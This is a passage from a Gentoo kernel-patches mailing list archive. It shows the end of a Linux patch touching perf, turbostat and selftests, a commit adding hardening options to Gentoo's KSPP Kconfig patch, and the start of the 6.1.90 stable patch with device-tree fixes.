+diff --git a/tools/include/linux/panic.h b/tools/include/linux/panic.h
+new file mode 100644
+index 0000000000000..9c8f17a41ce8e
+--- /dev/null
++++ b/tools/include/linux/panic.h
+@@ -0,0 +1,19 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#ifndef _TOOLS_LINUX_PANIC_H
++#define _TOOLS_LINUX_PANIC_H
++
++#include <stdarg.h>
++#include <stdio.h>
++#include <stdlib.h>
++
++static inline void panic(const char *fmt, ...)
++{
++	va_list argp;
++
++	va_start(argp, fmt);
++	vfprintf(stderr, fmt, argp);
++	va_end(argp);
++	exit(-1);
++}
++
++#endif
+diff --git a/tools/perf/util/unwind-libdw.c b/tools/perf/util/unwind-libdw.c
+index 94aa40f6e3482..9a7bdc0e14cc2 100644
+--- a/tools/perf/util/unwind-libdw.c
++++ b/tools/perf/util/unwind-libdw.c
+@@ -45,6 +45,7 @@ static int __report_module(struct addr_location *al, u64 ip,
+ {
+ 	Dwfl_Module *mod;
+ 	struct dso *dso = NULL;
++	Dwarf_Addr base;
+ 	/*
+ 	 * Some callers will use al->sym, so we can't just use the
+ 	 * cheaper thread__find_map() here.
+@@ -57,24 +58,36 @@ static int __report_module(struct addr_location *al, u64 ip,
+ 	if (!dso)
+ 		return 0;
+ 
++	/*
++	 * The generated JIT DSO files only map the code segment without
++	 * ELF headers.  Since JIT codes used to be packed in a memory
++	 * segment, calculating the base address using pgoff falls info
++	 * a different code in another DSO.  So just use the map->start
++	 * directly to pick the correct one.
++	 */
++	if (!strncmp(dso->long_name, "/tmp/jitted-", 12))
++		base = al->map->start;
++	else
++		base = al->map->start - al->map->pgoff;
++
+ 	mod = dwfl_addrmodule(ui->dwfl, ip);
+ 	if (mod) {
+ 		Dwarf_Addr s;
+ 
+ 		dwfl_module_info(mod, NULL, &s, NULL, NULL, NULL, NULL, NULL);
+-		if (s != al->map->start - al->map->pgoff)
+-			mod = 0;
++		if (s != base)
++			mod = NULL;
+ 	}
+ 
+ 	if (!mod)
+ 		mod = dwfl_report_elf(ui->dwfl, dso->short_name, dso->long_name, -1,
+-				      al->map->start - al->map->pgoff, false);
++				      base, false);
+ 	if (!mod) {
+ 		char filename[PATH_MAX];
+ 
+ 		if (dso__build_id_filename(dso, filename, sizeof(filename), false))
+ 			mod = dwfl_report_elf(ui->dwfl, dso->short_name, filename, -1,
+-					      al->map->start - al->map->pgoff, false);
++					      base, false);
+ 	}
+ 
+ 	if (mod) {
+diff --git a/tools/perf/util/unwind-libunwind-local.c b/tools/perf/util/unwind-libunwind-local.c
+index 81b6bd6e1536a..b276e36e3fb41 100644
+--- a/tools/perf/util/unwind-libunwind-local.c
++++ b/tools/perf/util/unwind-libunwind-local.c
+@@ -327,7 +327,7 @@ static int read_unwind_spec_eh_frame(struct dso *dso, struct unwind_info *ui,
+ 
+ 	maps__for_each_entry(ui->thread->maps, map) {
+ 		if (map->dso == dso && map->start < base_addr)
+-			base_addr = map->start;
++			base_addr = map->start - map->pgoff;
+ 	}
+ 	base_addr -= dso->data.elf_base_addr;
+ 	/* Address of .eh_frame_hdr */
+diff --git a/tools/power/x86/turbostat/turbostat.8 b/tools/power/x86/turbostat/turbostat.8
+index 3e1a4c4be001a..7112d4732d287 100644
+--- a/tools/power/x86/turbostat/turbostat.8
++++ b/tools/power/x86/turbostat/turbostat.8
+@@ -370,7 +370,7 @@ below the processor's base frequency.
+ 
+ Busy% = MPERF_delta/TSC_delta
+ 
+-Bzy_MHz = TSC_delta/APERF_delta/MPERF_delta/measurement_interval
++Bzy_MHz = TSC_delta*APERF_delta/MPERF_delta/measurement_interval
+ 
+ Note that these calculations depend on TSC_delta, so they
+ are not reliable during intervals when TSC_MHz is not running at the base frequency.
+diff --git a/tools/power/x86/turbostat/turbostat.c b/tools/power/x86/turbostat/turbostat.c
+index b113900d94879..a41bad8e653bb 100644
+--- a/tools/power/x86/turbostat/turbostat.c
++++ b/tools/power/x86/turbostat/turbostat.c
+@@ -53,6 +53,8 @@
+ #define	NAME_BYTES 20
+ #define PATH_BYTES 128
+ 
++#define MAX_NOFILE 0x8000
++
+ enum counter_scope { SCOPE_CPU, SCOPE_CORE, SCOPE_PACKAGE };
+ enum counter_type { COUNTER_ITEMS, COUNTER_CYCLES, COUNTER_SECONDS, COUNTER_USEC };
+ enum counter_format { FORMAT_RAW, FORMAT_DELTA, FORMAT_PERCENT };
+@@ -1811,9 +1813,10 @@ int sum_counters(struct thread_data *t, struct core_data *c, struct pkg_data *p)
+ 	average.packages.rapl_dram_perf_status += p->rapl_dram_perf_status;
+ 
+ 	for (i = 0, mp = sys.pp; mp; i++, mp = mp->next) {
+-		if (mp->format == FORMAT_RAW)
+-			continue;
+-		average.packages.counter[i] += p->counter[i];
++		if ((mp->format == FORMAT_RAW) && (topo.num_packages == 0))
++			average.packages.counter[i] = p->counter[i];
++		else
++			average.packages.counter[i] += p->counter[i];
+ 	}
+ 	return 0;
+ }
+@@ -1966,7 +1969,7 @@ unsigned long long get_uncore_mhz(int package, int die)
+ {
+ 	char path[128];
+ 
+-	sprintf(path, "/sys/devices/system/cpu/intel_uncore_frequency/package_0%d_die_0%d/current_freq_khz", package,
++	sprintf(path, "/sys/devices/system/cpu/intel_uncore_frequency/package_%02d_die_%02d/current_freq_khz", package,
+ 		die);
+ 
+ 	return (snapshot_sysfs_counter(path) / 1000);
+@@ -6718,6 +6721,22 @@ void cmdline(int argc, char **argv)
+ 	}
+ }
+ 
++void set_rlimit(void)
++{
++	struct rlimit limit;
++
++	if (getrlimit(RLIMIT_NOFILE, &limit) < 0)
++		err(1, "Failed to get rlimit");
++
++	if (limit.rlim_max < MAX_NOFILE)
++		limit.rlim_max = MAX_NOFILE;
++	if (limit.rlim_cur < MAX_NOFILE)
++		limit.rlim_cur = MAX_NOFILE;
++
++	if (setrlimit(RLIMIT_NOFILE, &limit) < 0)
++		err(1, "Failed to set rlimit");
++}
++
+ int main(int argc, char **argv)
+ {
+ 	outf = stderr;
+@@ -6730,6 +6749,9 @@ int main(int argc, char **argv)
+ 
+ 	probe_sysfs();
+ 
++	if (!getuid())
++		set_rlimit();
++
+ 	turbostat_init();
+ 
+ 	msr_sum_record();
+diff --git a/tools/testing/selftests/bpf/prog_tests/bloom_filter_map.c b/tools/testing/selftests/bpf/prog_tests/bloom_filter_map.c
+index d2d9e965eba59..f79815b7e951b 100644
+--- a/tools/testing/selftests/bpf/prog_tests/bloom_filter_map.c
++++ b/tools/testing/selftests/bpf/prog_tests/bloom_filter_map.c
+@@ -2,6 +2,7 @@
+ /* Copyright (c) 2021 Facebook */
+ 
+ #include <sys/syscall.h>
++#include <limits.h>
+ #include <test_progs.h>
+ #include "bloom_filter_map.skel.h"
+ 
+@@ -21,6 +22,11 @@ static void test_fail_cases(void)
+ 	if (!ASSERT_LT(fd, 0, "bpf_map_create bloom filter invalid value size 0"))
+ 		close(fd);
+ 
++	/* Invalid value size: too big */
++	fd = bpf_map_create(BPF_MAP_TYPE_BLOOM_FILTER, NULL, 0, INT32_MAX, 100, NULL);
++	if (!ASSERT_LT(fd, 0, "bpf_map_create bloom filter invalid value too large"))
++		close(fd);
++
+ 	/* Invalid max entries size */
+ 	fd = bpf_map_create(BPF_MAP_TYPE_BLOOM_FILTER, NULL, 0, sizeof(value), 0, NULL);
+ 	if (!ASSERT_LT(fd, 0, "bpf_map_create bloom filter invalid max entries size"))
+diff --git a/tools/testing/selftests/timers/valid-adjtimex.c b/tools/testing/selftests/timers/valid-adjtimex.c
+index 48b9a803235a8..d13ebde203221 100644
+--- a/tools/testing/selftests/timers/valid-adjtimex.c
++++ b/tools/testing/selftests/timers/valid-adjtimex.c
+@@ -21,9 +21,6 @@
+  *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+  *   GNU General Public License for more details.
+  */
+-
+-
+-
+ #include <stdio.h>
+ #include <stdlib.h>
+ #include <time.h>
+@@ -62,45 +59,47 @@ int clear_time_state(void)
+ #define NUM_FREQ_OUTOFRANGE 4
+ #define NUM_FREQ_INVALID 2
+ 
++#define SHIFTED_PPM (1 << 16)
++
+ long valid_freq[NUM_FREQ_VALID] = {
+-	-499<<16,
+-	-450<<16,
+-	-400<<16,
+-	-350<<16,
+-	-300<<16,
+-	-250<<16,
+-	-200<<16,
+-	-150<<16,
+-	-100<<16,
+-	-75<<16,
+-	-50<<16,
+-	-25<<16,
+-	-10<<16,
+-	-5<<16,
+-	-1<<16,
++	 -499 * SHIFTED_PPM,
++	 -450 * SHIFTED_PPM,
++	 -400 * SHIFTED_PPM,
++	 -350 * SHIFTED_PPM,
++	 -300 * SHIFTED_PPM,
++	 -250 * SHIFTED_PPM,
++	 -200 * SHIFTED_PPM,
++	 -150 * SHIFTED_PPM,
++	 -100 * SHIFTED_PPM,
++	  -75 * SHIFTED_PPM,
++	  -50 * SHIFTED_PPM,
++	  -25 * SHIFTED_PPM,
++	  -10 * SHIFTED_PPM,
++	   -5 * SHIFTED_PPM,
++	   -1 * SHIFTED_PPM,
+ 	-1000,
+-	1<<16,
+-	5<<16,
+-	10<<16,
+-	25<<16,
+-	50<<16,
+-	75<<16,
+-	100<<16,
+-	150<<16,
+-	200<<16,
+-	250<<16,
+-	300<<16,
+-	350<<16,
+-	400<<16,
+-	450<<16,
+-	499<<16,
++	    1 * SHIFTED_PPM,
++	    5 * SHIFTED_PPM,
++	   10 * SHIFTED_PPM,
++	   25 * SHIFTED_PPM,
++	   50 * SHIFTED_PPM,
++	   75 * SHIFTED_PPM,
++	  100 * SHIFTED_PPM,
++	  150 * SHIFTED_PPM,
++	  200 * SHIFTED_PPM,
++	  250 * SHIFTED_PPM,
++	  300 * SHIFTED_PPM,
++	  350 * SHIFTED_PPM,
++	  400 * SHIFTED_PPM,
++	  450 * SHIFTED_PPM,
++	  499 * SHIFTED_PPM,
+ };
+ 
+ long outofrange_freq[NUM_FREQ_OUTOFRANGE] = {
+-	-1000<<16,
+-	-550<<16,
+-	550<<16,
+-	1000<<16,
++	-1000 * SHIFTED_PPM,
++	 -550 * SHIFTED_PPM,
++	  550 * SHIFTED_PPM,
++	 1000 * SHIFTED_PPM,
+ };
+ 
+ #define LONG_MAX (~0UL>>1)


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-05-05 18:10 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-05-05 18:10 UTC (permalink / raw
  To: gentoo-commits

commit:     5d2714f1df1d6389f8b3907e9264f212004ae185
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun May  5 18:09:49 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun May  5 18:09:49 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=5d2714f1

Update to KSPP patch

Bug: https://bugs.gentoo.org/930733

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 4567_distro-Gentoo-Kconfig.patch | 47 ++++++++++++++++++----------------------
 1 file changed, 21 insertions(+), 26 deletions(-)

diff --git a/4567_distro-Gentoo-Kconfig.patch b/4567_distro-Gentoo-Kconfig.patch
index 4dcd85ca..87b8fa95 100644
--- a/4567_distro-Gentoo-Kconfig.patch
+++ b/4567_distro-Gentoo-Kconfig.patch
@@ -6,9 +6,9 @@
  source "Documentation/Kconfig"
 +
 +source "distro/Kconfig"
---- /dev/null	2024-04-27 13:10:54.188000027 -0400
-+++ b/distro/Kconfig	2024-04-27 18:16:00.549054795 -0400
-@@ -0,0 +1,295 @@
+--- /dev/null	2024-05-05 10:40:37.103999988 -0400
++++ b/distro/Kconfig	2024-05-05 13:37:37.699554927 -0400
+@@ -0,0 +1,310 @@
 +menu "Gentoo Linux"
 +
 +config GENTOO_LINUX
@@ -178,7 +178,7 @@
 +		to unmet dependencies. Search for GENTOO_KERNEL_SELF_PROTECTION_COMMON and search for 
 +		GENTOO_KERNEL_SELF_PROTECTION_{X86_64, ARM64, X86_32, ARM} for dependency information on your 
 +		specific architecture.
-+		Note 2: Please see the URL above for numeric settings, e.g. CONFIG_DEFAULT_MMAP_MIN_ADDR=65536 
++		Note 2: Please see the URL above for numeric settings, e.g. CONFIG_DEFAULT_MMAP_MIN_ADDR=65536
 +		for X86_64
 +
 +if GENTOO_KERNEL_SELF_PROTECTION
@@ -201,10 +201,13 @@
 +	select DEBUG_SG
 +	select HARDENED_USERCOPY if HAVE_HARDENED_USERCOPY_ALLOCATOR=y
 +	select KFENCE if HAVE_ARCH_KFENCE && (!SLAB || SLUB)
++	select PAGE_TABLE_CHECK if ARCH_SUPPORTS_PAGE_TABLE_CHECK=y && EXCLUSIVE_SYSTEM_RAM=y  
++	select PAGE_TABLE_CHECK_ENFORCED if PAGE_TABLE_CHECK=y
 +	select RANDOMIZE_KSTACK_OFFSET_DEFAULT if HAVE_ARCH_RANDOMIZE_KSTACK_OFFSET && (INIT_STACK_NONE || !CC_IS_CLANG || CLANG_VERSION>=140000)
 +	select SECURITY_LANDLOCK
 +	select SCHED_CORE if SCHED_SMT
 +	select BUG_ON_DATA_CORRUPTION
++	select RANDOM_KMALLOC_CACHE if SLUB_TINY=n
 +	select SCHED_STACK_END_CHECK
 +	select SECCOMP if HAVE_ARCH_SECCOMP
 +	select SECCOMP_FILTER if HAVE_ARCH_SECCOMP_FILTER
@@ -245,11 +248,13 @@
 +	default n
 +	
 +	select GCC_PLUGIN_STACKLEAK
++	select X86_KERNEL_IBT if CC_HAS_IBT=y && HAVE_OBJTOOL=y && (!LD_IS_LLD=n || LLD_VERSION>=140000) 
 +	select LEGACY_VSYSCALL_NONE
 + 	select PAGE_TABLE_ISOLATION
 +	select RANDOMIZE_BASE
 +	select RANDOMIZE_MEMORY
 +	select RELOCATABLE
++	select X86_USER_SHADOW_STACK if AS_WRUSS=Y
 +	select VMAP_STACK
 +
 +
@@ -259,11 +264,21 @@
 +	depends on ARM64
 +	default n
 +
-+	select RANDOMIZE_BASE
-+	select RELOCATABLE
++	select ARM64_BTI
++	select ARM64_E0PD
++	select ARM64_EPAN if ARM64_PAN=y
++	select ARM64_MTE if (ARM64_AS_HAS_MTE=y && ARM64_TAGGED_ADDR_ABI=y ) && ( AS_HAS_ARMV8_5=y ) && ( AS_HAS_LSE_ATOMICS=y ) && ( ARM64_PAN=y )
++	select ARM64_PTR_AUTH
++	select ARM64_PTR_AUTH_KERNEL if ( ARM64_PTR_AUTH=y ) && (( CC_HAS_SIGN_RETURN_ADDRESS=y || CC_HAS_BRANCH_PROT_PAC_RET=y ) && AS_HAS_ARMV8_3=y ) && ( LD_IS_LLD=y || LD_VERSION >= 23301 || ( CC_IS_GCC=y && GCC_VERSION < 90100 )) && (CC_IS_CLANG=n || AS_HAS_CFI_NEGATE_RA_STATE=y ) && ((FUNCTION_GRAPH_TRACER=n || DYNAMIC_FTRACE_WITH_ARGS=y ))
++	select ARM64_BTI_KERNEL if ( ARM64_BTI=y ) && ( ARM64_PTR_AUTH_KERNEL=y ) && ( CC_HAS_BRANCH_PROT_PAC_RET_BTI=y ) && (CC_IS_GCC=n || GCC_VERSION >= 100100 ) && (CC_IS_GCC=n ) && ((FUNCTION_GRAPH_TRACE=n || DYNAMIC_FTRACE_WITH_ARG=y ))
 +	select ARM64_SW_TTBR0_PAN
 +	select CONFIG_UNMAP_KERNEL_AT_EL0
 +	select GCC_PLUGIN_STACKLEAK
++	select KASAN_HW_TAGS if HAVE_ARCH_KASAN_HW_TAGS=y
++	select RANDOMIZE_BASE
++	select RELOCATABLE
++	select SHADOW_CALL_STACK if ARCH_SUPPORTS_SHADOW_CALL_STACK=y && (DYNAMIC_FTRACE_WITH_ARGS=y || DYNAMIC_FTRACE_WITH_REGS=y || FUNCTION_GRAPH_TRACER=n) && MMU=y 
++	select UNWIND_PATCH_PAC_INTO_SCS if (CC_IS_CLANG=y && CLANG_VERSION >= CONFIG_150000 ) && ( ARM64_PTR_AUTH_KERNEL=y && CC_HAS_BRANCH_PROT_PAC_RET=y ) && ( SHADOW_CALL_STACK=y )
 +	select VMAP_STACK
 +
 +config GENTOO_KERNEL_SELF_PROTECTION_X86_32
@@ -304,26 +319,6 @@
 +		See the settings that become available for more details and fine-tuning.
 +
 +endmenu
-index 9e921fc72..f29bc13fa 100644
---- a/security/selinux/Kconfig
-+++ b/security/selinux/Kconfig
-@@ -26,6 +26,7 @@ config SECURITY_SELINUX_BOOTPARAM
- config SECURITY_SELINUX_DISABLE
- 	bool "NSA SELinux runtime disable"
- 	depends on SECURITY_SELINUX
-+	depends on !GENTOO_KERNEL_SELF_PROTECTION
- 	select SECURITY_WRITABLE_HOOKS
- 	default n
- 	help
--- 
-2.31.1
-
-From bd3ff0b16792c18c0614c2b95e148943209f460a Mon Sep 17 00:00:00 2001
-From: Georgy Yakovlev <gyakovlev@gentoo.org>
-Date: Tue, 8 Jun 2021 13:59:57 -0700
-Subject: [PATCH 2/2] set DEFAULT_MMAP_MIN_ADDR by default
-
----
  mm/Kconfig | 2 ++
  1 file changed, 2 insertions(+)
 


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-05-02 15:01 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-05-02 15:01 UTC (permalink / raw
  To: gentoo-commits

commit:     5932c07fdc5b0460fb7007a450b095e3ff4f3cc0
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu May  2 15:01:37 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu May  2 15:01:37 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=5932c07f

Linux patch 6.1.90

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1089_linux-6.1.90.patch | 3634 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 3638 insertions(+)

diff --git a/0000_README b/0000_README
index d6fe6f2d..1123ae49 100644
--- a/0000_README
+++ b/0000_README
@@ -399,6 +399,10 @@ Patch:  1088_linux-6.1.89.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.89
 
+Patch:  1089_linux-6.1.90.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.90
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1089_linux-6.1.90.patch b/1089_linux-6.1.90.patch
new file mode 100644
index 00000000..d5c9c046
--- /dev/null
+++ b/1089_linux-6.1.90.patch
@@ -0,0 +1,3634 @@
+diff --git a/Documentation/admin-guide/sysctl/net.rst b/Documentation/admin-guide/sysctl/net.rst
+index 6394f5dc2303d..e3894c928118c 100644
+--- a/Documentation/admin-guide/sysctl/net.rst
++++ b/Documentation/admin-guide/sysctl/net.rst
+@@ -205,6 +205,11 @@ Will increase power usage.
+ 
+ Default: 0 (off)
+ 
++mem_pcpu_rsv
++------------
++
++Per-cpu reserved forward alloc cache size in page units. Default 1MB per CPU.
++
+ rmem_default
+ ------------
+ 
+diff --git a/Makefile b/Makefile
+index a0472e1cf7156..7ae5cf9ec9e55 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 89
++SUBLEVEL = 90
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/Kconfig b/arch/Kconfig
+index f99fd9a4ca778..e959abf969ec3 100644
+--- a/arch/Kconfig
++++ b/arch/Kconfig
+@@ -9,6 +9,14 @@
+ #
+ source "arch/$(SRCARCH)/Kconfig"
+ 
++config ARCH_CONFIGURES_CPU_MITIGATIONS
++	bool
++
++if !ARCH_CONFIGURES_CPU_MITIGATIONS
++config CPU_MITIGATIONS
++	def_bool y
++endif
++
+ menu "General architecture-dependent options"
+ 
+ config CRASH_CORE
+diff --git a/arch/arc/boot/dts/hsdk.dts b/arch/arc/boot/dts/hsdk.dts
+index 6691f42550778..41b980df862b1 100644
+--- a/arch/arc/boot/dts/hsdk.dts
++++ b/arch/arc/boot/dts/hsdk.dts
+@@ -205,7 +205,6 @@ dmac_cfg_clk: dmac-gpu-cfg-clk {
+ 		};
+ 
+ 		gmac: ethernet@8000 {
+-			#interrupt-cells = <1>;
+ 			compatible = "snps,dwmac";
+ 			reg = <0x8000 0x2000>;
+ 			interrupts = <10>;
+diff --git a/arch/arm/boot/dts/at91-sama7g5ek.dts b/arch/arm/boot/dts/at91-sama7g5ek.dts
+index 4af8a1c96ed63..bede6e88ae110 100644
+--- a/arch/arm/boot/dts/at91-sama7g5ek.dts
++++ b/arch/arm/boot/dts/at91-sama7g5ek.dts
+@@ -293,7 +293,7 @@ vddcore: VDD_CORE {
+ 
+ 					regulator-state-standby {
+ 						regulator-on-in-suspend;
+-						regulator-suspend-voltage = <1150000>;
++						regulator-suspend-microvolt = <1150000>;
+ 						regulator-mode = <4>;
+ 					};
+ 
+@@ -314,7 +314,7 @@ vddcpu: VDD_OTHER {
+ 
+ 					regulator-state-standby {
+ 						regulator-on-in-suspend;
+-						regulator-suspend-voltage = <1050000>;
++						regulator-suspend-microvolt = <1050000>;
+ 						regulator-mode = <4>;
+ 					};
+ 
+@@ -331,7 +331,7 @@ vldo1: LDO1 {
+ 					regulator-always-on;
+ 
+ 					regulator-state-standby {
+-						regulator-suspend-voltage = <1800000>;
++						regulator-suspend-microvolt = <1800000>;
+ 						regulator-on-in-suspend;
+ 					};
+ 
+@@ -346,7 +346,7 @@ vldo2: LDO2 {
+ 					regulator-max-microvolt = <3700000>;
+ 
+ 					regulator-state-standby {
+-						regulator-suspend-voltage = <1800000>;
++						regulator-suspend-microvolt = <1800000>;
+ 						regulator-on-in-suspend;
+ 					};
+ 
+diff --git a/arch/arm64/boot/dts/mediatek/mt2712-evb.dts b/arch/arm64/boot/dts/mediatek/mt2712-evb.dts
+index d31a194124c91..03fd9df16999e 100644
+--- a/arch/arm64/boot/dts/mediatek/mt2712-evb.dts
++++ b/arch/arm64/boot/dts/mediatek/mt2712-evb.dts
+@@ -128,7 +128,7 @@ ethernet_phy0: ethernet-phy@5 {
+ };
+ 
+ &pio {
+-	eth_default: eth_default {
++	eth_default: eth-default-pins {
+ 		tx_pins {
+ 			pinmux = <MT2712_PIN_71_GBE_TXD3__FUNC_GBE_TXD3>,
+ 				 <MT2712_PIN_72_GBE_TXD2__FUNC_GBE_TXD2>,
+@@ -155,7 +155,7 @@ mdio_pins {
+ 		};
+ 	};
+ 
+-	eth_sleep: eth_sleep {
++	eth_sleep: eth-sleep-pins {
+ 		tx_pins {
+ 			pinmux = <MT2712_PIN_71_GBE_TXD3__FUNC_GPIO71>,
+ 				 <MT2712_PIN_72_GBE_TXD2__FUNC_GPIO72>,
+@@ -181,14 +181,14 @@ mdio_pins {
+ 		};
+ 	};
+ 
+-	usb0_id_pins_float: usb0_iddig {
++	usb0_id_pins_float: usb0-iddig-pins {
+ 		pins_iddig {
+ 			pinmux = <MT2712_PIN_12_IDDIG_P0__FUNC_IDDIG_A>;
+ 			bias-pull-up;
+ 		};
+ 	};
+ 
+-	usb1_id_pins_float: usb1_iddig {
++	usb1_id_pins_float: usb1-iddig-pins {
+ 		pins_iddig {
+ 			pinmux = <MT2712_PIN_14_IDDIG_P1__FUNC_IDDIG_B>;
+ 			bias-pull-up;
+diff --git a/arch/arm64/boot/dts/mediatek/mt2712e.dtsi b/arch/arm64/boot/dts/mediatek/mt2712e.dtsi
+index 1ac0b2cf3d406..fde2b165f55d2 100644
+--- a/arch/arm64/boot/dts/mediatek/mt2712e.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt2712e.dtsi
+@@ -249,10 +249,11 @@ topckgen: syscon@10000000 {
+ 		#clock-cells = <1>;
+ 	};
+ 
+-	infracfg: syscon@10001000 {
++	infracfg: clock-controller@10001000 {
+ 		compatible = "mediatek,mt2712-infracfg", "syscon";
+ 		reg = <0 0x10001000 0 0x1000>;
+ 		#clock-cells = <1>;
++		#reset-cells = <1>;
+ 	};
+ 
+ 	pericfg: syscon@10003000 {
+diff --git a/arch/arm64/boot/dts/mediatek/mt7622.dtsi b/arch/arm64/boot/dts/mediatek/mt7622.dtsi
+index 7bb316922a3a9..f8a32006885bb 100644
+--- a/arch/arm64/boot/dts/mediatek/mt7622.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt7622.dtsi
+@@ -251,7 +251,7 @@ scpsys: power-controller@10006000 {
+ 		clock-names = "hif_sel";
+ 	};
+ 
+-	cir: cir@10009000 {
++	cir: ir-receiver@10009000 {
+ 		compatible = "mediatek,mt7622-cir";
+ 		reg = <0 0x10009000 0 0x1000>;
+ 		interrupts = <GIC_SPI 175 IRQ_TYPE_LEVEL_LOW>;
+@@ -282,16 +282,14 @@ thermal_calibration: calib@198 {
+ 		};
+ 	};
+ 
+-	apmixedsys: apmixedsys@10209000 {
+-		compatible = "mediatek,mt7622-apmixedsys",
+-			     "syscon";
++	apmixedsys: clock-controller@10209000 {
++		compatible = "mediatek,mt7622-apmixedsys";
+ 		reg = <0 0x10209000 0 0x1000>;
+ 		#clock-cells = <1>;
+ 	};
+ 
+-	topckgen: topckgen@10210000 {
+-		compatible = "mediatek,mt7622-topckgen",
+-			     "syscon";
++	topckgen: clock-controller@10210000 {
++		compatible = "mediatek,mt7622-topckgen";
+ 		reg = <0 0x10210000 0 0x1000>;
+ 		#clock-cells = <1>;
+ 	};
+@@ -514,7 +512,6 @@ thermal: thermal@1100b000 {
+ 			 <&pericfg CLK_PERI_AUXADC_PD>;
+ 		clock-names = "therm", "auxadc";
+ 		resets = <&pericfg MT7622_PERI_THERM_SW_RST>;
+-		reset-names = "therm";
+ 		mediatek,auxadc = <&auxadc>;
+ 		mediatek,apmixedsys = <&apmixedsys>;
+ 		nvmem-cells = <&thermal_calibration>;
+@@ -734,9 +731,8 @@ wmac: wmac@18000000 {
+ 		power-domains = <&scpsys MT7622_POWER_DOMAIN_WB>;
+ 	};
+ 
+-	ssusbsys: ssusbsys@1a000000 {
+-		compatible = "mediatek,mt7622-ssusbsys",
+-			     "syscon";
++	ssusbsys: clock-controller@1a000000 {
++		compatible = "mediatek,mt7622-ssusbsys";
+ 		reg = <0 0x1a000000 0 0x1000>;
+ 		#clock-cells = <1>;
+ 		#reset-cells = <1>;
+@@ -793,9 +789,8 @@ u2port1: usb-phy@1a0c5000 {
+ 		};
+ 	};
+ 
+-	pciesys: pciesys@1a100800 {
+-		compatible = "mediatek,mt7622-pciesys",
+-			     "syscon";
++	pciesys: clock-controller@1a100800 {
++		compatible = "mediatek,mt7622-pciesys";
+ 		reg = <0 0x1a100800 0 0x1000>;
+ 		#clock-cells = <1>;
+ 		#reset-cells = <1>;
+@@ -921,12 +916,13 @@ sata_port: sata-phy@1a243000 {
+ 		};
+ 	};
+ 
+-	hifsys: syscon@1af00000 {
+-		compatible = "mediatek,mt7622-hifsys", "syscon";
++	hifsys: clock-controller@1af00000 {
++		compatible = "mediatek,mt7622-hifsys";
+ 		reg = <0 0x1af00000 0 0x70>;
++		#clock-cells = <1>;
+ 	};
+ 
+-	ethsys: syscon@1b000000 {
++	ethsys: clock-controller@1b000000 {
+ 		compatible = "mediatek,mt7622-ethsys",
+ 			     "syscon";
+ 		reg = <0 0x1b000000 0 0x1000>;
+@@ -966,9 +962,7 @@ wed1: wed@1020b000 {
+ 	};
+ 
+ 	eth: ethernet@1b100000 {
+-		compatible = "mediatek,mt7622-eth",
+-			     "mediatek,mt2701-eth",
+-			     "syscon";
++		compatible = "mediatek,mt7622-eth";
+ 		reg = <0 0x1b100000 0 0x20000>;
+ 		interrupts = <GIC_SPI 223 IRQ_TYPE_LEVEL_LOW>,
+ 			     <GIC_SPI 224 IRQ_TYPE_LEVEL_LOW>,
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183.dtsi b/arch/arm64/boot/dts/mediatek/mt8183.dtsi
+index d5d9b954c449a..2147e152683bf 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183.dtsi
+@@ -1554,6 +1554,7 @@ mfgcfg: syscon@13000000 {
+ 			compatible = "mediatek,mt8183-mfgcfg", "syscon";
+ 			reg = <0 0x13000000 0 0x1000>;
+ 			#clock-cells = <1>;
++			power-domains = <&spm MT8183_POWER_DOMAIN_MFG_ASYNC>;
+ 		};
+ 
+ 		gpu: gpu@13040000 {
+diff --git a/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi b/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi
+index c6080af1e4a30..0814ed6a7272d 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi
+@@ -903,7 +903,7 @@ regulators {
+ 			mt6315_6_vbuck1: vbuck1 {
+ 				regulator-compatible = "vbuck1";
+ 				regulator-name = "Vbcpu";
+-				regulator-min-microvolt = <300000>;
++				regulator-min-microvolt = <400000>;
+ 				regulator-max-microvolt = <1193750>;
+ 				regulator-enable-ramp-delay = <256>;
+ 				regulator-allowed-modes = <0 1 2>;
+@@ -913,7 +913,7 @@ mt6315_6_vbuck1: vbuck1 {
+ 			mt6315_6_vbuck3: vbuck3 {
+ 				regulator-compatible = "vbuck3";
+ 				regulator-name = "Vlcpu";
+-				regulator-min-microvolt = <300000>;
++				regulator-min-microvolt = <400000>;
+ 				regulator-max-microvolt = <1193750>;
